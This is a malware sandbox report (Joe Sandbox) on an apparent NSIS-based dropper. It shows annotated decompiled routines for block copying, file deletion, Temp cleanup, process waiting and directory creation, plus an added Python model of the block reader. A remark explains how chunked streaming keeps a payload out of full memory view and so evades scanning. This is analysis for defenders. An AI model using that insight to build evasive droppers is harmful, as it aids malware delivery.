                                                        								if(_t27 != 0) {
                                                        									_t36 = _v8;
                                                        									 *0x79f734 =  *0x79f734 + _t36;
                                                        									goto L21;
                                                        								} else {
                                                        									goto L18;
                                                        								}
                                                        							} else { // no buffer: stream the block to _a8 through the staging buffer at 0x793730
                                                        								if(_a4 <= 0) {
                                                        									goto L21;
                                                        								} else {
                                                        									while(1) {
                                                        										_t28 = _a4;
                                                        										if(_a4 >= 0x4000) {
                                                        											_t28 = 0x4000; // the staging buffer holds 16 KiB per pass
                                                        										}
                                                        										_v8 = _t28;
                                                        										if(E004061E1( *0x40a01c, 0x793730, _t28) == 0) {
                                                        											goto L18;
                                                        										}
                                                        										_t30 = E00406210(_a8, 0x793730, _v8); // executed; hand the chunk to _a8 (body not shown)
                                                        										if(_t30 == 0) {
                                                        											_push(0xfffffffe); // return -2: handing the chunk to _a8 failed
                                                        											L19:
                                                        											_pop(_t22);
                                                        										} else {
                                                        											_t31 = _v8;
                                                        											_a4 = _a4 - _t31;
                                                        											 *0x79f734 =  *0x79f734 + _t31;
                                                        											_t36 = _t36 + _t31;
                                                        											if(_a4 > 0) {
                                                        												continue;
                                                        											} else {
                                                        												goto L21;
                                                        											}
                                                        										}
                                                        										goto L22;
                                                        									}
                                                        									goto L18;
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        				}
                                                        				L22:
                                                        				return _t22;
                                                        			}
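The truncated routine above reads as a length-prefixed block copier: optionally seek the source handle, read a 4-byte length, then either copy up to the caller's buffer size into memory or stream the block to a second handle through the 16 KiB staging buffer at 0x793730, returning -3 on a failed read and -2 on a failed write. The Python model below restates that logic so it can be exercised offline; it is an added example, not code from the report or from the sample. It assumes E004061E1 succeeds only when every requested byte was read, that E0040347F (not shown in the report) is a bounds check on the length that returns 0 on success, and that the length prefix is little-endian; the input bytes produced by make_source are constructed for the example.

```python
import io
from typing import Callable, Optional, Tuple

# Constants taken from the decompiled routine above
CHUNK = 0x4000   # size of the staging buffer at 0x793730
ERR_READ = -3    # 0xfffffffd, pushed at L18: a read from the source handle failed
ERR_WRITE = -2   # 0xfffffffe: the destination rejected a chunk


class BlockReader:
    """Model of the length-prefixed block reader.

    `pos` models the global at 0x79f734: the offset within the source that the
    routine keeps in step with every seek and read it performs.
    """

    def __init__(self, src: io.BufferedIOBase) -> None:
        self.src = src
        self.pos = 0

    def _read_exact(self, n: int) -> Optional[bytes]:
        # Assumed behaviour of E004061E1: success only if all n bytes arrived.
        data = self.src.read(n)
        return data if data is not None and len(data) == n else None

    def _begin(self, offset: Optional[int]) -> int:
        """Seek when an offset is given, then read the 4-byte length prefix."""
        if offset is not None:            # the SetFilePointer branch
            self.pos = offset
            self.src.seek(offset)
        hdr = self._read_exact(4)
        if hdr is None:
            return ERR_READ
        self.pos += 4
        length = int.from_bytes(hdr, "little", signed=True)  # assumption: little-endian
        # E0040347F is not visible in the report; assumed to be a bounds check that
        # rejects a negative length (its real error code is unknown, -3 is used here).
        return ERR_READ if length < 0 else length

    def read_to_memory(self, offset: Optional[int], out_size: int) -> Tuple[int, bytes]:
        """Buffer mode (_a12 != 0): one ReadFile of min(length, out_size) bytes."""
        length = self._begin(offset)
        if length < 0:
            return length, b""
        n = min(length, out_size)         # the clamp against _a16
        data = self._read_exact(n)
        if data is None:
            return ERR_READ, b""
        self.pos += n
        return n, data                    # bytes copied, as the routine returns

    def read_to_sink(self, offset: Optional[int], sink: Callable[[bytes], bool]) -> int:
        """Stream mode (_a12 == 0): copy through the staging buffer in CHUNK pieces.

        `sink` stands in for E00406210 writing to handle _a8; it returns False on failure.
        """
        length = self._begin(offset)
        if length <= 0:
            return length                 # error, or an empty block (nothing to copy)
        total = 0
        while length > 0:
            n = min(length, CHUNK)
            chunk = self._read_exact(n)
            if chunk is None:
                return ERR_READ
            if not sink(chunk):
                return ERR_WRITE
            length -= n
            self.pos += n
            total += n
        return total


def make_source(*blocks: bytes, drop_tail: int = 0) -> io.BytesIO:
    """Constructed test input: [u32 length][payload] records, optionally truncated."""
    raw = b"".join(len(b).to_bytes(4, "little") + b for b in blocks)
    return io.BytesIO(raw[: len(raw) - drop_tail] if drop_tail else raw)
```

When triaging a dropper built around a reader like this, the two modes matter: the buffer mode is how small headers get pulled into memory, the stream mode is how a payload larger than 16 KiB is written out to a dropped file without ever being fully resident, so a memory scan of the staging buffer only ever sees one chunk at a time.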

                                                        APIs
                                                        • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,00403323,000000FF,00000000,00000000,?,?), ref: 0040339C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: FilePointer
                                                        • String ID: 07y
                                                        • API String ID: 973152223-1660179758
                                                        • Opcode ID: 6b22196eac9600fa0887d596689305aa324d5ca70b4b9ec5c244ac4710233144
                                                        • Instruction ID: 558639dd8831905cecc0235a21772d735375f1fafe9af626847c4dd8eee9aa20
                                                        • Opcode Fuzzy Hash: 6b22196eac9600fa0887d596689305aa324d5ca70b4b9ec5c244ac4710233144
                                                        • Instruction Fuzzy Hash: 73319330201218FFDF129FA5ED85D9E3F68EB00359F10803AF905E9190D778DA51DBA9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph
                                                        control_flow_graph 609 405d32-405d43 call 406139 612 405d73 609->612 613 405d45-405d4b 609->613 614 405d75-405d77 612->614 615 405d55 DeleteFileW 613->615 616 405d4d-405d53 RemoveDirectoryW 613->616 617 405d5b-405d5d 615->617 616->617 618 405d64-405d69 617->618 619 405d5f-405d62 617->619 618->612 620 405d6b-405d6d SetFileAttributesW 618->620 619->614 620->612
                                                        C-Code - Quality: 41%
                                                        			E00405D32(void* __eflags, WCHAR* _a4, signed int _a8) {
                                                        				int _t9;
                                                        				long _t13;
                                                        				WCHAR* _t14;
                                                        
                                                        				_t14 = _a4;
                                                        				_t13 = E00406139(_t14); // per the subcall APIs below: reads the attributes, clears them, returns the original value
                                                        				if(_t13 == 0xffffffff) { // INVALID_FILE_ATTRIBUTES: path not found
                                                        					L8:
                                                        					return 0;
                                                        				}
                                                        				_push(_t14);
                                                        				if((_a8 & 0x00000001) == 0) { // bit 0 of the flags selects directory removal
                                                        					_t9 = DeleteFileW();
                                                        				} else {
                                                        					_t9 = RemoveDirectoryW(); // executed
                                                        				}
                                                        				if(_t9 == 0) { // removal failed
                                                        					if((_a8 & 0x00000004) == 0) { // unless bit 2 is set, put the saved attributes back
                                                        						SetFileAttributesW(_t14, _t13);
                                                        					}
                                                        					goto L8;
                                                        				} else {
                                                        					return 1;
                                                        				}
                                                        			}

                                                        APIs
                                                          • Part of subcall function 00406139: GetFileAttributesW.KERNELBASE(?,?,00405D3E,?,?,00000000,00405F14,?,?,?,?), ref: 0040613E
                                                          • Part of subcall function 00406139: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406152
                                                        • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F14), ref: 00405D4D
                                                        • DeleteFileW.KERNEL32(?,?,?,00000000,00405F14), ref: 00405D55
                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D6D
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: File$Attributes$DeleteDirectoryRemove
                                                        • String ID:
                                                        • API String ID: 1655745494-0
                                                        • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                        • Instruction ID: 65d886778d981234f1bc095319bf1530848ff53bfe772b7143d7b60a17f83489
                                                        • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                        • Instruction Fuzzy Hash: E1E0E531204EA056C7106B35AD0CF5B2A98EF86314F05893FF592B10D0D77888078AAE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph
                                                        control_flow_graph 621 406ae6-406afe WaitForSingleObject 622 406b0e-406b10 621->622 623 406b00-406b0c call 406a77 WaitForSingleObject 622->623 624 406b12-406b25 GetExitCodeProcess 622->624 623->622
                                                        C-Code - Quality: 100%
                                                        			E00406AE6(void* __ecx, void* _a4) {
                                                        				long _v8;
                                                        				long _t6;
                                                        
                                                        				_t6 = WaitForSingleObject(_a4, 0x64); // poll the process handle with a 100 ms timeout
                                                        				while(_t6 == 0x102) { // WAIT_TIMEOUT: the process is still running
                                                        					E00406A77(0xf); // called between polls (body not shown)
                                                        					_t6 = WaitForSingleObject(_a4, 0x64);
                                                        				}
                                                        				GetExitCodeProcess(_a4,  &_v8); // executed
                                                        				return _v8; // exit code of the awaited process
                                                        			}

                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F9F,?,?,?,?,?,?), ref: 00406AF7
                                                        • WaitForSingleObject.KERNEL32(?,00000064,0000000F,?,?,00401F9F,?,?,?,?,?,?), ref: 00406B0C
                                                        • GetExitCodeProcess.KERNELBASE(?,?), ref: 00406B19
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: ObjectSingleWait$CodeExitProcess
                                                        • String ID:
                                                        • API String ID: 2567322000-0
                                                        • Opcode ID: 283581236024a182d03fca7383c40b0f2a2dbb9aa7d2600e4fb29ca982165da2
                                                        • Instruction ID: 2c972b7a35bd62db52b15041da2731f4b89024a3c017fe3bef96d42d01d66162
                                                        • Opcode Fuzzy Hash: 283581236024a182d03fca7383c40b0f2a2dbb9aa7d2600e4fb29ca982165da2
                                                        • Instruction Fuzzy Hash: 67E09271600218BBEB00AB54DD05E9E7F7EDB44700F110032F601F6190C6B1EE22DAA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph
                                                        control_flow_graph 627 403c2b-403c3a 628 403c46-403c4e 627->628 629 403c3c-403c3f CloseHandle 627->629 630 403c50-403c53 CloseHandle 628->630 631 403c5a-403c66 call 403c88 call 405d7a 628->631 629->628 630->631 635 403c6b-403c6c 631->635
                                                        C-Code - Quality: 100%
                                                        			E00403C2B() {
                                                        				void* _t1;
                                                        				void* _t2;
                                                        				void* _t4;
                                                        				signed int _t11;
                                                        
                                                        				_t1 =  *0x40a018; // 0xffffffff
                                                        				if(_t1 != 0xffffffff) { // a handle is open (not INVALID_HANDLE_VALUE)
                                                        					CloseHandle(_t1); // executed
                                                        					 *0x40a018 =  *0x40a018 | 0xffffffff; // reset the global to INVALID_HANDLE_VALUE
                                                        				}
                                                        				_t2 =  *0x40a01c; // 0xffffffff
                                                        				if(_t2 != 0xffffffff) { // same for the second global handle (the one the block reader above passes to ReadFile)
                                                        					CloseHandle(_t2);
                                                        					 *0x40a01c =  *0x40a01c | 0xffffffff;
                                                        					_t11 =  *0x40a01c;
                                                        				}
                                                        				E00403C88();
                                                        				_t4 = E00405D7A(_t11, 0x7b6000, 7); // executed; cleanup helper (body not shown); the Strings list below shows this function references C:\Users\user\AppData\Local\Temp\
                                                        				return _t4;
                                                        			}

                                                        APIs
                                                        • CloseHandle.KERNELBASE(FFFFFFFF), ref: 00403C3D
                                                        • CloseHandle.KERNEL32(FFFFFFFF), ref: 00403C51
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C30
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 2962429428-4017390910
                                                        • Opcode ID: 52edf64d19f6e486756a6566919607a0afda347394bdeaae2c0f5391c2589c01
                                                        • Instruction ID: 4491f7c80fa00ae2087dec4a459748e9e372b7f9a3145cafecdefc003a92e639
                                                        • Opcode Fuzzy Hash: 52edf64d19f6e486756a6566919607a0afda347394bdeaae2c0f5391c2589c01
                                                        • Instruction Fuzzy Hash: F3E0863244471896D1347F7DAE4D9853B195F413327204326F178F20F0C7389AA74A99
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (E004015C1): basic blocks as address ranges, the calls each block makes, and its successors. The executed / not-executed colouring of the original graph is not reproduced in text.
                                                        • 4015c1-4015d5: call 402da6, call 405fe8 -> 401631-401634, 4015d7-4015ea
                                                        • 4015d7-4015ea: call 405f6a -> 401604-401607, 4015ec-4015ef
                                                        • 4015ec-4015ef -> 401604-401607, 4015f1-4015f8
                                                        • 4015f1-4015f8: call 405c39 -> 401604-401607, 4015fa-4015fd
                                                        • 4015fa-4015fd: call 405b9f -> 401602
                                                        • 401602 -> 40160c-40160e
                                                        • 401604-401607: call 405c1c -> 40160c-40160e
                                                        • 40160c-40160e -> 401610-401615, 401627-40162f
                                                        • 401610-401615 -> 401617-401622, 401624
                                                        • 401617-401622: GetFileAttributesW -> 401627-40162f, 401624
                                                        • 401624 -> 401627-40162f
                                                        • 401627-40162f -> 401631-401634, 4015d7-4015ea
                                                        • 401631-401634 -> 401663-4022f6, 401636-401655
                                                        • 401636-401655: call 401423, call 40666e, SetCurrentDirectoryW -> 402c2a-402c39, 40165b-40165e
                                                        • 40165b-40165e -> 402c2a-402c39
                                                        • 401663-4022f6: call 401423 -> 402c2a-402c39, 40292e-402935
                                                        • 40292e-402935 -> 402c2a-402c39
                                                        • 402c2a-402c39 (exit)
                                                        C-Code - Quality: 86%
                                                        			E004015C1(short __ebx, void* __eflags) {
                                                        				void* _t17;
                                                        				int _t23;
                                                        				void* _t25;
                                                        				signed char _t26;
                                                        				short _t28;
                                                        				short _t31;
                                                        				short* _t34;
                                                        				void* _t36;
                                                        
                                                        				_t28 = __ebx;
                                                        				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                                                        				_t17 = E00405FE8(_t16);
                                                        				_t32 = _t17;
                                                        				if(_t17 != __ebx) {
                                                        					do {
                                                        						_t34 = E00405F6A(_t32, 0x5c); // 0x5c = '\\': locate the next path separator, so each directory component is created in turn
                                                        						_t31 =  *_t34;
                                                        						 *_t34 = _t28;
                                                        						if(_t31 != _t28) {
                                                        							L5:
                                                        							_t25 = E00405C1C( *(_t36 + 8));
                                                        						} else {
                                                        							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                                                        							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C39(_t42) == 0) {
                                                        								goto L5;
                                                        							} else {
                                                        								_t25 = E00405B9F( *(_t36 + 8)); // executed
                                                        							}
                                                        						}
                                                        						if(_t25 != _t28) {
                                                        							if(_t25 != 0xb7) { // 0xb7 = ERROR_ALREADY_EXISTS: only tolerated if the existing object is a directory
                                                        								L9:
                                                        								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                        							} else {
                                                        								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                        								if((_t26 & 0x00000010) == 0) { // 0x10 = FILE_ATTRIBUTE_DIRECTORY
                                                        									goto L9;
                                                        								}
                                                        							}
                                                        						}
                                                        						 *_t34 = _t31;
                                                        						_t32 = _t34 + 2;
                                                        					} while (_t31 != _t28);
                                                        				}
                                                        				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                                                        					_push(0xfffffff5);
                                                        					E00401423();
                                                        				} else {
                                                        					E00401423(0xffffffe6);
                                                        					E0040666E(0x7b4000,  *(_t36 + 8));
                                                        					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                        					if(_t23 == 0) {
                                                        						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                        					}
                                                        				}
                                                        				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t36 - 4));
                                                        				return 0;
                                                        			}

                                                        APIs
                                                          • Part of subcall function 00405FE8: CharNextW.USER32(?), ref: 00405FF6
                                                          • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00405FFB
                                                          • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00406013
                                                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                          • Part of subcall function 00405B9F: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BE2
                                                        • SetCurrentDirectoryW.KERNELBASE(?,007B4000,?,00000000,000000F0), ref: 0040164D
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                        • String ID:
                                                        • API String ID: 1892508949-0
                                                        • Opcode ID: f9cb4e2508e2448aa58c0f22a173479fd38d1f56d80015943564eb9aeda41760
                                                        • Instruction ID: 957f66bc23545469dbc724fd3d157a479205f5e7ec4e330cdfccc87aa14dd729
                                                        • Opcode Fuzzy Hash: f9cb4e2508e2448aa58c0f22a173479fd38d1f56d80015943564eb9aeda41760
                                                        • Instruction Fuzzy Hash: 3111E231408115EBCF217FA5CD4099E36A0EF15369B28493BFA01B22F1DA3E49829B5E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 53%
                                                        			E00406045(void* __eflags, intOrPtr _a4) {
                                                        				int _t11;
                                                        				signed char* _t12;
                                                        				long _t16;
                                                        				intOrPtr _t18;
                                                        				intOrPtr* _t21;
                                                        				signed int _t23;
                                                        
                                                        				E0040666E(0x7a4790, _a4);
                                                        				_t21 = E00405FE8(0x7a4790);
                                                        				if(_t21 != 0) {
                                                        					E004068F5(_t21);
                                                        					if(( *0x7a8ab8 & 0x00000080) == 0) {
                                                        						L5:
                                                        						_t23 = _t21 - 0x7a4790 >> 1;
                                                        						while(1) {
                                                        							_t11 = lstrlenW(0x7a4790);
                                                        							_push(0x7a4790);
                                                        							if(_t11 <= _t23) {
                                                        								break;
                                                        							}
                                                        							_t12 = E004069A4();
                                                        						if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) { // 0x10 = FILE_ATTRIBUTE_DIRECTORY: strip trailing directory components
                                                        								E00405F89(0x7a4790);
                                                        								continue;
                                                        							} else {
                                                        								goto L1;
                                                        							}
                                                        						}
                                                        						E00405F3D();
                                                        					_t16 = GetFileAttributesW(??); // executed
                                                        					return 0 | _t16 != 0xffffffff; // 0xffffffff = INVALID_FILE_ATTRIBUTES: returns 1 if the path exists
                                                        					}
                                                        					_t18 =  *_t21;
                                                        					if(_t18 == 0 || _t18 == 0x5c) {
                                                        						goto L1;
                                                        					} else {
                                                        						goto L5;
                                                        					}
                                                        				}
                                                        				L1:
                                                        				return 0;
                                                        			}

                                                        APIs
                                                          • Part of subcall function 0040666E: lstrcpynW.KERNEL32(?,?,00000400,004037B6,007A7AA0,NSIS Error), ref: 0040667B
                                                          • Part of subcall function 00405FE8: CharNextW.USER32(?), ref: 00405FF6
                                                          • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00405FFB
                                                          • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00406013
                                                        • lstrlenW.KERNEL32(007A4790,00000000,007A4790,007A4790,7556D4C4,?,755513E0,00405D9A,?,7556D4C4,755513E0,00000000), ref: 0040609E
                                                        • GetFileAttributesW.KERNELBASE(007A4790,007A4790,007A4790,007A4790,007A4790,007A4790,00000000,007A4790,007A4790,7556D4C4,?,755513E0,00405D9A,?,7556D4C4,755513E0), ref: 004060AE
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                        • String ID:
                                                        • API String ID: 3248276644-0
                                                        • Opcode ID: fa3c9235a4b418ee68dfdff8e4277a43b5875b963336551736dc5840a4575c34
                                                        • Instruction ID: 38ed1c6f7611cbdad0e8a1dc3f16fb44af04154f1bcb09577380b12bcb23f66f
                                                        • Opcode Fuzzy Hash: fa3c9235a4b418ee68dfdff8e4277a43b5875b963336551736dc5840a4575c34
                                                        • Instruction Fuzzy Hash: 31F0282A148A5219D622B33A0D05ABF05458EC2354B0B063FFC53B12D1DF7C897385BF
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 69%
                                                        			E00401389(signed int _a4) {
                                                        				intOrPtr* _t6;
                                                        				void* _t8;
                                                        				void* _t10;
                                                        				signed int _t11;
                                                        				void* _t12;
                                                        				signed int _t16;
                                                        				signed int _t17;
                                                        				void* _t18;
                                                        
                                                        				_t17 = _a4;
                                                        				while(_t17 >= 0) {
                                                        					_t6 = _t17 * 0x1c +  *0x7a8ad0; // instruction table at *0x7a8ad0, 0x1c bytes per entry, indexed by _t17
                                                        					if( *_t6 == 1) { // entry opcode 1 terminates the walk (return marker)
                                                        						break;
                                                        					}
                                                        					_push(_t6); // executed
                                                        					_t8 = E00401434(); // executed
                                                        					if(_t8 == 0x7fffffff) { // error sentinel from the entry handler, propagated unchanged to the caller
                                                        						return 0x7fffffff;
                                                        					}
                                                        					_t10 = E0040136D(_t8);
                                                        					if(_t10 != 0) {
                                                        						_t11 = _t10 - 1;
                                                        						_t16 = _t17;
                                                        						_t17 = _t11;
                                                        						_t12 = _t11 - _t16;
                                                        					} else {
                                                        						_t12 = _t10 + 1;
                                                        						_t17 = _t17 + 1;
                                                        					}
                                                        					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                        						 *0x7a7a8c =  *0x7a7a8c + _t12;
                                                        						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x7a7a8c, 0x7530,  *0x7a7a74), 0); // 0x402 = PBM_SETPOS; 0x7530 = 30000, the progress-bar range
                                                        					}
                                                        				}
                                                        				return 0;
                                                        			}

                                                        APIs
                                                        • MulDiv.KERNEL32 ref: 004013E4
                                                        • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
